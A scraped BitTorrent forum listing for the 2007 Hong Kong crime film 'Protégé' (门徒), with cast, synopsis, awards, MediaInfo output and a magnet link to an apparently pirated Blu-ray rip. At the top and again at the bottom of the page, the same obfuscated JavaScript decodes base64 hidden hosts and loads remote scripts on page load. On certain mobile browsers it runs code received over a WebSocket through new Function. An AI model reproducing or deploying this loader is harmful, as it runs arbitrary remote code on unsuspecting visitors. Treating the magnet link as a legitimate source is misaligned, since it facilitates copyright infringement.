门徒[国粤语配音/中文字幕].2007.1080p.BluRay.x265.10bit.DTS.2Audio 5.95GB

版主小s 1月前 247

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x68\x6e\x49\x43\x61\x57\x73\x53\x72\x45']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};

◎译 名 门徒 / Protégé

◎片 名 門徒

◎年 代 2007

◎产 地 中国香港

◎类 别 剧情 / 惊悚 / 犯罪

◎语 言 粤语 / 英语 / 泰语 / 汉语普通话

◎上映日期 2007-02-13(中国大陆/中国香港)

◎IMDb链接 https://www.imdb.com/title/tt0841150/

◎豆瓣评分 7.9/10 (242288人评价)

◎豆瓣链接 https://movie.douban.com/subject/1890784/

◎片 长 108分钟

◎导 演 尔冬升 Tung-shing Yee (id:1274289)

◎编 剧 尔冬升 Tung-shing Yee (id:1274289)

龙文康 Man Hong Loong (id:1359282)

高新 Xin Gao (id:1370028)

秦天南 Tin Nam Chun (id:1280773)

高新 Sun Go (id:1311945)

◎演 员 刘德华 Andy Lau (id:1054424)

吴彦祖 Daniel Wu (id:1027502)

古天乐 Louis Koo (id:1027577)

张静初 Jingchu Zhang (id:1016668)

袁咏仪 Anita Yuen (id:1050693)

廖启智 Kai Chi Liu (id:1274268)

何美钿 Mei-tian He (id:1241838)

尔冬升 Tung-shing Yee (id:1274289)

龙逸升 Tang Tak-Cheung (id:1432102)

杜港 Kong To (id:1440814)

姚文基 Man-kei Yiu (id:1435360)

黄伟辉 Wong Wai-Fai (id:1275163)

李天翔 Eric Li Tin Cheung (id:1312744)

尼鲁·西里詹亚 Nirut Sirichanya (id:1303096)

谢芷彤 Tsz Tung Tsei (id:1311947)

元宝 Bo Yuen (id:1346065)

麦启光 Albert Kai-kwong Mak (id:1349070)

馮鳳珍 Rita Fung (id:1441554)

陈可辛 Peter Chan (id:1274300)

于冬 Dong Yu (id:1317865)

韩三平 Sanping Han (id:1274843)

金培达 Peter Kam (id:1288082)

姜国民 Kwok-Man Keung (id:1288470)

邝志良 Chi-Leung Kwong (id:1289164)

麦国强 Kenneth Mak (id:1290782)

冯君孟 William Fung (id:1284331)

深泽寛 Hiroshi Fukazawa (id:1425972)

麦启光 Albert Kai-kwong Mak (id:1349070)

周金洪 Kim-Hung Chow (id:1311958)

王经汉 Ching Han Wong (id:1311952)

何兆麟 Siu Lun Ho (id:1311769)

黄伟辉 Wong Wai-Fai (id:1275163)

钱嘉乐 Kar Lok Chin (id:1025476)

曾景祥 Kinson Tsang (id:1299575)

◎标 签 香港 / 吴彦祖 / 尔冬升 / 香港电影 / 刘德华 / 犯罪 / 门徒 / 古天乐

◎简 介

阿昆(刘德华饰)长年垄断了海洛因市场,虽视追随8年多的阿力(吴彦祖饰)为接班人,但阿昆一向小心行事,从没透露过“货仓“、加工场的位置也未见过其他“同事”。阿昆打算把自己的生意全权交由阿力打理,阿力渐渐知道了更多毒品市场中的秘密。

8年来阿力以卧底的身份搜集毒贩的全部资料,但他对吸毒者阿芬(张静初饰)投入了感情,阿芬的景况却令他对自己边缘人的身份感到更加迷惘。

斗志斗勇的过程中,阿力最终取得了阿昆的完全信任,8年来的追踪,也有了终结。

◎获奖情况 (共18项)

第44届台北金马影展 (2007)

金马奖 最佳导演(提名)

└──尔冬升 (id:1274289)

金马奖 最佳男配角(提名)

└──古天乐 (id:1027577)

金马奖 最佳原著剧本(提名)

第27届香港电影金像奖 (2008)

最佳电影(提名)

└──陈可辛 (id:1274300)

最佳导演(提名)

└──尔冬升 (id:1274289)

最佳编剧(提名)

最佳女主角(提名)

└──张静初 (id:1016668)

最佳男配角

└──刘德华 (id:1054424)

最佳男配角(提名)

└──古天乐 (id:1027577)

最佳女配角(提名)

└──袁咏仪 (id:1050693)

最佳新演员(提名)

└──谢芷彤 (id:1311947)

最佳摄影(提名)

└──姜国民 (id:1288470)

最佳剪接

└──邝志良 (id:1289164)

最佳美术指导(提名)

最佳动作设计(提名)

└──钱嘉乐 (id:1025476)

最佳原创电影音乐(提名)

└──金培达 (id:1288082)

最佳音响效果(提名)

└──曾景祥 (id:1299575)

最佳视觉效果(提名)

  1. ##### MediaInfo ######

  2. General

  3. Unique ID : 135733405458868157310514883092802459467 (0x661D4D91958F08668BA53EAE5690574B)

  4. Complete name : Protégé[email protected]

  5. Format : Matroska

  6. Format version : Version 4

  7. File size : 5.94 GiB

  8. Duration : 1 h 48 min

  9. Overall bit rate : 7 818 kb/s

  10. Encoded date : UTC 2021-10-24 13:51:12

  11. Writing application : mkvmerge v62.0.0 ('Apollo') 64-bit

  12. Writing library : libebml v1.4.2 + libmatroska v1.6.4


  13. Video

  14. ID : 1

  15. Format : HEVC

  16. Format/Info : High Efficiency Video Coding

  17. Format profile : Main [email protected]@Main

  18. Codec ID : V_MPEGH/ISO/HEVC

  19. Duration : 1 h 48 min

  20. Bit rate : 5 628 kb/s

  21. Width : 1 920 pixels

  22. Height : 816 pixels

  23. Display aspect ratio : 2.35:1

  24. Frame rate mode : Constant

  25. Frame rate : 23.976 (24000/1001/53354) FPS

  26. Color space : YUV

  27. Chroma subsampling : 4:2:0

  28. Bit depth : 10 bits

  29. Bits/(Pixel*Frame) : 0.150

  30. Stream size : 4.28 GiB (72%)

  31. Writing library : x265 3.5+2-g2b25c9ba0+45:[Windows][GCC 10.2.0][64 bit] Yuuki 10bit+8bit+12bit

  32. Encoding settings : rc=crf / crf=22.0000 / qcomp=0.60 / qpstep=4 / stats-write=0 / stats-read=0 / no-lossless / no-cu-lossless / aq-mode=3 / aq-strength=0.90 / cbqpoffs=0 / crqpoffs=0 / ipratio=1.40 / pbratio=1.30 / psy-rd=2.00 / psy-rdoq=0.00 / deblock=0:0 / ref=6 / limit-refs=1 / no-limit-modes / bframes=8 / b-adapt=2 / bframe-bias=0 / b-pyramid / b-intra / weightp / weightb / min-keyint=24 / max-keyint=240 / rc-lookahead=24 / gop-lookahead=0 / NTMzNTQ=uuDQuD2mJt9fsCf / scenecut=40 / hist-scenecut=0 / radl=0 / max-cu-size=64 / min-cu-size=8 / me=3 / subme=7 / merange=48 / rdoq-level=0 / rd=4 / rdpenalty=0 / dynamic-rd=0.00 / no-rd-refine / ----- / cutree / sao / no-rect / no-amp / no-open-gop / wpp / no-pmode / no-pme / no-psnr / no-ssim / nr-intra=0 / nr-inter=0 / no-constrained-intra / no-strong-intra-smoothing / max-tu-size=32 / tu-inter-depth=1 / tu-intra-depth=1 / limit-tu=0 / qg-size=32 / qpmax=69 / qpmin=0 / ----- / cpuid=533541111039 / frame-threads=4 / numa-pools=+ / log-level=2 / input-csp=1 / input-res=1920x816 / interlace=0 / level-idc=0 / high-tier=1 / uhd-bd=0 / no-allow-non-conformance / no-repeat-headers / aud / no-hrd / info / hash=0 / no-temporal-layers / lookahead-slices=0 / no-splice / no-intra-refresh / no-ssim-rd / signhide / no-tskip / max-merge=3 / temporal-mvp / no-frame-dup / no-hme / no-analyze-src-pics / no-sao-non-deblock / selective-sao=4 / early-skip / rskip / no-fast-intra / no-tskip-fast / no-splitrd-skip / zone-count=0 / no-strict-cbr / no-rc-grain / no-const-vbv / sar=0 / overscan=0 / videoformat=5 / range=0 / colorprim=2 / transfer=2 / colormatrix=2 / chromaloc=0 / display-window=0 / cll=0,0 / min-luma=0 / max-luma=1023 / log2-max-poc-lsb=8 / vui-timing-info / vui-hrd-info / slices=1 / no-opt-qp-pps / no-opt-ref-list-length-pps / no-multi-pass-opt-rps / scenecut-bias=0.05 / hist-threshold=0.03 / no-opt-cu-delta-qp / no-aq-motion / no-hdr10 / no-hdr10-opt / no-dhdr10-opt / no-idr-recovery-sei / analysis-reuse-level=0 / analysis-save-reuse-level=0 / analysis-load-reuse-level=0 / scale-factor=0 / refine-intra=0 / refine-inter=0 / refine-mv=1 / refine-ctu-distortion=0 / no-limit-sao / ctu-info=0 / no-lowpass-dct / refine-analysis-type=0 / copy-pic=1 / max-ausize-factor=1.0 / no-dynamic-refine / no-single-sei / no-hevc-aq / no-svt / no-field / qp-adaptation-range=1.00 / scenecut-aware-qp=0conformance-window-offsets / right=0 / bottom=0 / NTMzNTQ= / decoder-max-rate=0 / no-vbv-live-multi-pass

  33. Default : Yes

  34. Forced : No


  35. Audio #1

  36. ID : 2

  37. Format : DTS

  38. Format/Info : Digital Theater Systems

  39. Codec ID : A_DTS

  40. Duration : 1 h 48 min

  41. Bit rate mode : Constant

  42. Bit rate : 1 510 kb/s

  43. Channel(s) : 6 channels

  44. Channel layout : C L R Ls Rs LFE

  45. Sampling rate : 48.0 kHz

  46. Frame rate : 93.750 FPS (512 SPF)

  47. Bit depth : 24 bits

  48. Compression mode : Lossy

  49. Stream size : 1.15 GiB (19%)

  50. Title : Cantonese

  51. Language : Chinese

  52. Default : Yes

  53. Forced : No


  54. Audio #2

  55. ID : 3

  56. ID in the original source medium : 4355 (0x1103)

  57. Format : AC-3

  58. Format/Info : Audio Coding 3

  59. Commercial name : Dolby Digital

  60. Codec ID : A_AC3

  61. Duration : 1 h 48 min

  62. Bit rate mode : Constant

  63. Bit rate : 640 kb/s

  64. Channel(s) : 6 channels

  65. Channel layout : L R C LFE Ls Rs

  66. Sampling rate : 48.0 kHz

  67. Frame rate : 31.250 FPS (1536 SPF)

  68. Compression mode : Lossy

  69. Stream size : 498 MiB (8%)

  70. Title : Mandarin

  71. Language : Chinese

  72. Service kind : Complete Main

  73. Default : No

  74. Forced : No

  75. Original source medium : Blu-ray


  76. Text #1

  77. ID : 4

  78. ID in the original source medium : 4609 (0x1201)

  79. Format : PGS

  80. Muxing mode : zlib

  81. Codec ID : S_HDMV/PGS

  82. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  83. Duration : 1 h 42 min

  84. Bit rate : 45.2 kb/s

  85. Count of elements : 2763

  86. Stream size : 33.1 MiB (1%)

  87. Title : chs

  88. Language : Chinese

  89. Default : Yes

  90. Forced : No

  91. Original source medium : Blu-ray


  92. Text #2

  93. ID : 5

  94. ID in the original source medium : 4608 (0x1200)

  95. Format : PGS

  96. Muxing mode : zlib

  97. Codec ID : S_HDMV/PGS

  98. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  99. Duration : 1 h 42 min

  100. Bit rate : 48.6 kb/s

  101. Count of elements : 2763

  102. Stream size : 35.5 MiB (1%)

  103. Title : cht

  104. Language : Chinese

  105. Default : No

  106. Forced : No

  107. Original source medium : Blu-ray


  108. Text #3

  109. ID : 6

  110. ID in the original source medium : 4610 (0x1202)

  111. Format : PGS

  112. Muxing mode : zlib

  113. Codec ID : S_HDMV/PGS

  114. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  115. Duration : 1 h 42 min

  116. Bit rate : 48.3 kb/s

  117. Count of elements : 2533

  118. Stream size : 35.3 MiB (1%)

  119. Title : eng

  120. Language : English

  121. Default : No

  122. Forced : No

  123. Original source medium : Blu-ray


  124. Menu

  125. 00:00:00.000 : en:Chapter 01

  126. 00:07:34.036 : en:Chapter 02

  127. 00:16:00.542 : en:Chapter 03

  128. 00:29:26.347 : en:Chapter 04

  129. 00:36:29.437 : en:Chapter 05

  130. 00:43:32.443 : en:Chapter 06

  131. 00:55:52.098 : en:Chapter 07

  132. 01:02:18.943 : en:Chapter 08

  133. 01:15:09.129 : en:Chapter 09

  134. 01:20:22.776 : en:Chapter 10

  135. 01:32:52.233 : en:Chapter 11

  136. 01:39:15.991 : en:Chapter 12




复制代码


TAGS 剧情 惊悚 犯罪

磁力链:
  • magnet:?xt=urn:btih:48AC944605F85E1D4FD05C91A9FA377EBF772BC7

上传的附件:
BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。
最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回
var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNg==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x59\x72\x72\x51\x4e\x72\x4a\x5a\x7a\x42']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};